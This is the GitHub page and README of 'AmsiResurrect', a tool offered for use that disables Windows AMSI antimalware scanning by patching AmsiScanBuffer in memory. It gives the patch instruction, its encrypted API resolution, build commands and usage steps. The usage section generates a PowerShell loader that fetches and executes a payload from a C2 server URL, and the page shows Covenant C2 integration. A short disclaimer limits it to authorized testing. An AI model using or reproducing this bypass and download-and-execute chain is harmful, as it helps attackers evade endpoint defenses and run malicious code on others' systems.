Skip to content

3xploit666/AmsiResurrect

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
AM
AM
 
 
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
AM.sln
AM.sln
 
 
ConvertBytes2.ps1
ConvertBytes2.ps1
 
 
README.md
README.md
 
 
shell.jpg
shell.jpg
 
 

Repository files navigation

AmsiResurrect

AMSI Bypass via Resurrection Technique

C# .NET Windows License: MIT

In-memory AMSI patch using reflection-based assembly loading and encrypted API resolution

Overview

AmsiResurrect patches the Windows Antimalware Scan Interface (AMSI) in-memory by modifying AmsiScanBuffer to return E_INVALIDARG (0x80070057). This neutralizes AMSI scanning for the current process, allowing subsequent PowerShell payloads to execute unscanned.

The project includes a loader generator script that creates a self-contained PowerShell payload for use with C2 frameworks like Covenant.

How It Works

1. Assembly loaded via reflection  →  [Assembly]::Load(bytes)
2. Resurrect.Patch() called        →  Resolves amsi.dll + AmsiScanBuffer (AES-encrypted strings)
3. AmsiScanBuffer patched           →  mov eax, 0x80070057; ret
4. Remote payload downloaded        →  IEX via WebClient

Architecture

AmsiResurrect/
├── AM/
│   ├── Program.cs          — Core AMSI patch logic with AES-encrypted API resolution
│   ├── Apis.cs             — P/Invoke declarations (NativeMethods)
│   └── AM.csproj           — .NET Framework 4.7.2 project
├── ConvertBytes2.ps1       — Loader generator script
└── README.md
File Purpose
Program.cs Patches AmsiScanBuffer using VirtualProtect + Marshal.Copy
Apis.cs NativeMethods class with LoadLibrary, GetProcAddress, VirtualProtect
ConvertBytes2.ps1 Converts compiled DLL to byte array and generates PowerShell loader

Technical Details

  • Patch: mov eax, 0x80070057; ret — forces AmsiScanBuffer to return E_INVALIDARG
  • Encryption: API strings (amsi.dll, AmsiScanBuffer) encrypted with AES-256-CBC
  • Key Derivation: PBKDF2 (Rfc2898DeriveBytes) with 1000 iterations
  • Target: .NET Framework 4.7.2, AnyCPU

Build

# Visual Studio
Open AM.sln → Build → Release

# Command line (requires MSBuild)
msbuild AM.sln /p:Configuration=Release

Usage

1. Build the DLL

msbuild AM.sln /p:Configuration=Release

2. Generate the Loader

.\ConvertBytes2.ps1
# [***PATH FILE***]: .\AM\bin\Release\AM.dll
# [Payload URL]: https://your-c2/payload.ps1
# [+] Loader generated: C:\Users\<user>\loader.ps1

3. Execute

The generated loader.ps1 will:

  1. Load the assembly via reflection
  2. Call [AmsiResurrect.Resurrect]::Patch() to disable AMSI
  3. Download and execute the remote payload

Screenshots

AMSI Detection (Before Bypass):

Screenshot-5.png

Successful Bypass & Execution:

Screenshot-4.png

Launcher/Loader Integration:

Screenshot-8.png

Covenant C2 Panel:

Screenshot-9.png

Legal Disclaimer

This tool is intended for authorized penetration testing and security research only. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The author assumes no liability for misuse of this software.

Author

@3xploit666

For educational and authorized security testing purposes only.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

12 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages